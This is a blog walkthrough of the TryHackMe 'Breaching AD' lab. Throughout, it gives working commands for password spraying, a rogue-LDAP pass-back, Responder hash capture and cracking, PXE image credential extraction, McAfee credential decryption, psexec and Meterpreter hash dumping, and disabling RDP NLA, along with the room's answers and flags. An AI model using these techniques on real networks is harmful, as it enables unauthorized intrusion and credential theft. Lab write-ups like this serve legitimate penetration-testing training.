Breaching AD TryHackMe Walkthrough

Rich
8 min readFeb 4, 2024

TL;DR Walkthrough of the Breaching AD TryHackMe room, part of the Pentest+ pathway.

A full list of our TryHackMe walkthroughs and cheatsheets is here.

Background

I have been going through the rooms that TryHackMe added to their Pentest+ pathway since I took eJPT back in mid 2022. Some of these rooms overlap with THM’s Red Team pathway so I’m knocking out two birds with one stone so to speak as I’ll probably use the Red Team pathway for CPEs later.

I’m also hoping to try The Cyber Mentor’s Practical Junior Penetration Tester once I’m done with college so all this is good preparation.

Despite the name, there wasn’t much actual Active Directory material in this room.

I will show the questions and answers in each section, followed by how I got them. I did not really follow what the room said to do as I got busy using common tools like crackmapexec, smbclient, evil-winrm, and xfreerdp. It’s a good room overall though.

— — Task 1 — -

Configure your DNS settings in Kali as shown in the screen shot below. You may have to restart NetworkManager afterwards.

sudo systemctl restart NetworkManager

— — Task 2 — -

What popular website can be used to verify if your email address or password has ever been exposed in a publicly disclosed data breach?

HaveIBeenPwned

I assumed that like most THM AD rooms that there would be a user list hidden on the webserver somewhere, so I scanned it.

gobuster dir -u http://http://10.200.54.201 -w /usr/share/wordlists/dirb/common.txt

There’s nothing there though. THM simply gives you a username list in Task 3.

— — Task 3 — -

What is the name of the challenge-response authentication mechanism that uses NTLM?

NetNTLM

What is the username of the third valid credential pair found by the password spraying script?

msfconsole
use auxiliary/scanner/smb/smb_login
set RHOST 10.200.54.101
set USER_FILE /home/kali/Downloads/Wordlists/usernames.txt
set SMBPass Changeme123
set USER_AS_PASS true
run
  • hollie.powell
  • heather.smith
  • gordon.stevens = Answer
  • mark.oconnor

Crackmapexec is also quite useful for simple password spraying.

crackmapexec smb 10.200.54.101 -u /home/kali/Downloads/Wordlists/usernames.txt -p Changeme123

This THM room didn’t cover this, but if you learn an AD password that must be reset at next login you can do so from Kali.

/home/kali/Downloads/impacket-master/examples/./smbpasswd.py hollie.powell@10.200.54.101
Changeme123
Changeme1234 [put in twice to confirm]

I then leveraged the fact I now had creds to pull a list of usernames.

/home/kali/Downloads/impacket-master/build/scripts-3.9/lookupsid.py za.tryhackme.com/hollie.powell@10.200.54.101

This provided ugly looking results, so I cleaned it up with a simple PowerShell loop.

Set-Location "C:\Users\fdhsr\Google Drive\Documents\CompTIA studying\THM stuff\THM Windows Room"
$Lines = Get-Content .\BreachingADUsers.txt
ForEach($Line in $Lines)
{
($Line.Split("\")[1]).Split("(")[0] | Out-File .\ZaUsers.txt -Append
}

I then pulled just the computer names.

$Users = Get-Content .\ZaUsers.txt
ForEach($User in $Users)
{
If($User -like "*$*")
{Write-Host $User}
}

How many valid credentials pairs were found by the password spraying script?

4

What is the message displayed by the web application when authenticating with a valid credential pair?

Hello World

— — Task 4 — -

What type of attack can be performed against LDAP Authentication systems not commonly found against Windows Authentication systems?

LDAP Pass-back attack

What two authentication mechanisms do we allow on our rogue LDAP server to downgrade the authentication and make it clear text?

PLAIN, LOGIN

What is the password associated with the svcLDAP account?

#load slapd
sudo apt-get update && sudo apt-get -y install slapd ldap-utils && sudo systemctl enable slapd

#configure slapd
sudo dpkg-reconfigure -p low slapd
#(domain = za.tryhackme.com , everything else leave default)
#downgrade and restart slapd

#Save in file:
#olcSaslSecProps.ldif
dn: cn=config
replace: olcSaslSecProps
olcSaslSecProps: noanonymous,minssf=0,passcred

sudo ldapmodify -Y EXTERNAL -H ldapi:// -f /home/kali/Downloads/exploits/olcSaslSecProps.ldif && sudo service slapd restart

http://printer.za.tryhackme.com/settings.aspx -> Test Settings -> Input your Kali VM’s IP and hit ‘Test Settings’

#Check Wireshark or
sudo tcpdump -SX -i breachad tcp port 389

and we get:

za.tryhackme.com\svcLDAP..tryhackmeldappass1@

The answer for the THM question is

tryhackmeldappass1@

— — Task 5 — -

What is the name of the tool we can use to poison and capture authentication requests on the network?

Responder

What is the username associated with the challenge that was captured?

I had issues getting Responder to work right on my Kali VM. I probably need to update it. For this exercise I simply ran it on the attack box and then copy/pasted the results to my VM to crack it.

sudo Responder -I breachad

svcFileCopy

What is the value of the cracked password associated with the challenge that was captured?

Make sure you download the wordlist in the task files on THM, then crack it with hashcat.

hashcat -m 5600 'svcFileCopy::ZA:522aad72bf3e01f9:03813464D3291D2914C036E4FF630C8B:01010000000000000035AE7AB254DA01EB3CB0FEA7FA1BA900000000020008004F004E003000540001001E00570049004E002D0048003800500059004D004A0045004D004C005500340004003400570049004E002D0048003800500059004D004A0045004D004C00550034002E004F004E00300054002E004C004F00430041004C00030014004F004E00300054002E004C004F00430041004C00050014004F004E00300054002E004C004F00430041004C00070008000035AE7AB254DA010600040002000000080030003000000000000000000000000020000017508044BCA899B4EEAB91ECB988B7EEA2D269C56ED1789A1A44BA51720DB8A90A001000000000000000000000000000000000000900200063006900660073002F00310030002E00350030002E00350032002E00350033000000000000000000' -a 3 /home/kali/Downloads/Wordlists/passwordlist(BreachingAD).txt

FPassword1!

— — Task 6 — -

What Microsoft tool is used to create and host PXE Boot images in organizations?

Microsoft Deployment Toolkit

What network protocol is used for recovery of files from the MDT server?

DHCP

What is the username associated with the account that was stored in the PXE Boot image?

svcMDT

What is the password associated with the account that was stored in the PXE Boot image?

PXEBootSecure1@

I will put how I got the username and password from the PXE image here instead of after each question above as it’s a bit of a story. I started enumerating as soon as I got creds from Responder in Task 5

crackmapexec smb 10.200.54.201 -u svcFileCopy -p FPassword1! –shares

I realized that I had read access to another THM VM that I had enumerated back in Task 3 using lookupsid.py called THMMDT. I pinged it and got IP 10.200.54.201. So of course I went poking around with smbclient looking for a script or config file with plaintext creds.

I didn’t find creds, but I found the wim file used by PXE and pulled it.

smbclient \\\\10.200.54.202\\MTDBuildLab$ -U za.tryhackme.com\\svcFileCopy%FPassword1\!
cd Boot
get LiteTouchPE_x64.wim

I also realized that svcFileCopy has local admin rights on THMIIS, IP 10.200.54.201.

crackmapexec smb 10.200.54.201 -u svcFileCopy -p FPassword1! –shares

Hence I simply dropped the wim file and PowerPXE.ps1 on that VM and pulled the creds from the wim file.

Set-Location C:\inetpub\wwwroot\Tmp
. .\powerpxe-master\PowerPXE.ps1
$BCDFile = "x64{B29312CA-A921–4A4A-AA5C-B7B0C7C3005D}.bcd"
Get-WimFile -bcdFile $BCDFile
Get-FindCredentials -WimFile .\LiteTouchPE_x64.wim

How did we get RDP access to 10.200.54.201 though? Simple, I used WinRM to login as svcFileCopy and disabled NLA.

evil-winrm -i 10.200.54.201 -u svcFileCopy -p FPassword1!

#Disable NLA
$TargetMachine = $env:COMPUTERNAME ;
(Get-WmiObject -class "Win32_TSGeneralSetting" -Namespace root\cimv2\terminalservices -ComputerName $TargetMachine -Filter "TerminalName='RDP-tcp'").SetUserAuthenticationRequired(0)
xfreerdp /v:10.200.54.201 /u:svcFileCopy /p:FPassword1! /dynamic-resolution

For some reason WinRM later quit working on that THM VM, so when I went back on it to dump creds I used PSExec.

msfconsole
use exploit/windows/smb/psexec
set LHOST 10.50.52.17
set RHOST 10.200.54.201
set SMBUser svcFileCopy
set SMBPass FPassword1!
set SMBDomain za.tryhackme.com
run

run post/windows/gather/hashdump

I got the Domain Administrator’s hash from mscache.

load kiwi
kiwi_cmd '"lsadump::cache"'
hashcat -m2100 ‘$DCC2$10240#Administrator#292d29a56e155af797bd6cc034ae358b’ /home/kali/Downloads/Wordlists/rockyou.txt --force

Sadly I did not get a hit though. It turns out there’s a reason, see the summary.

— — Task 7 — -

What type of files often contain stored credentials on hosts?

Configuration Files

What is the name of the McAfee database that stores configuration including credentials used to connect to the orchestrator?

ma.db

What table in this database stores the credentials of the orchestrator?

AGENT_REPOSITORIES

What is the username of the AD account associated with the McAfee service?

THM gave us a username/password to login to THMJMP1, IP 10.200.54.248. They expected us to use SSH, but the account they gave us is a local admin on that VM so we can simply use WinRM.

Download the decoder from https://github.com/funoverip/mcafee-sitelist-pwd-decryption

evil-winrm -i 10.200.54.248 -u thm -p Password1@

download C:\ProgramData\McAfee\Agent\DB\ma.db

sqlitebrowser /home/kali/Downloads/Pilfered/BreachingAD/ma.db
pip3 install pycryptodome
./mcafee_sitelist_pwd_decrypt.py jWbTyS7BL1Hj7PkO5Di/QhhYmcGj5cOoZ2OkDTrFXsR/abAFPM9B3Q==

svcAV

What is the password of the AD account associated with the McAfee service?

MyStrongPassword!

Summary

I also dumped creds on 10.200.54.202 and 10.200.54.248 but all I got was the same mscache that wasn’t in rockyou.txt earlier. I also dropped SharpHound on 201 and fed the data into BloodHound on one of my Win10 VMs in the home lab. I marked the accounts we compromised in this room as owned and looked for an escalation path to Domain Admin. I did not find anything though.

Despite there not being all that much AD stuff in this room I poked around a bit looking. I loaded RSAT on THMIIS after I got local admin on it.

Get-WindowsFeature -Name "*RSAT*" | Add-WindowsFeature –IncludeAllSubFeatures

Get-ADComputer -Filter * -Properties * | Select-Object Name, IPv4Address

Name IPv4Address
- - - - - - - -
THMDC 10.200.54.101
THMIIS 10.200.54.201
THMMDT 10.200.54.202
THMJMP1 10.200.54.248

I checked to see if there was anything interesting in account descriptions.

Get-ADUser -Filter {Description -ne "$null"} -Properties * | Select-Object SamAccountName, Description

t0_tinus.green THM{Enumerating.Via.MMC}

Looking ahead in the Red Team Pathway, that’s an answer in Task 6 of the Enumerating Active Directory room.

I also checked for Kerberoastable or ASREProastable users.

Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties * | Select-Object SamAccountName, ServicePrincipalName

Get-ADUser -Filter {DoesNotRequirePreAuth -eq $true} -Properties * | Select-Object SAMAccountName

It appears based on the flag in Tinus Green’s account description that these VMs are or were used for another THM room. Overall it was a good room and I used a few tricks that I’ll add to our AD cheatsheet later.

Footnote on other THM AD rooms

I had to edit this walkthrough to add a footnote. In the Persisting Active Directory room THM gives us a password for the Administrator account. I had a sneaking suspicion, so I added that password to a wordlist I had on my Kali VM and tried running hashcat against that mscache hash I nabbed in this room.

hashcat -m2100 '$DCC2$10240#Administrator#292d29a56e155af797bd6cc034ae358b' /home/kali/Downloads/Wordlists/passwordlist.txt --force

Son of a Beach. The clever person who setup these rooms set the Administrator password to ‘tryhackmewouldnotguess1@’.

Well the good news is that I was barking up the right tree. I just didn’t have a good enough wordlist.

References

Password spray with Metasploit: https://www.offsec.com/metasploit-unleashed/smb-login-check/

Invoke-Mimikatz: https://github.com/clymb3r/PowerShell/blob/master/Invoke-Mimikatz/Invoke-Mimikatz.ps1

Meterpreter & kiwi: https://www.oreilly.com/library/view/mastering-metasploit/9781788990615/4d7912bf-2a5e-4c45-abf4-0d11b38f5e45.xhtml

PowerPXE: https://github.com/wavestone-cdt/powerpxe

Password spraying TTPs/tools: https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/password-spraying

--

--

Rich

I work various IT jobs & like Windows domain security as a hobby. Most of what’s here is my notes from auditing or the lab.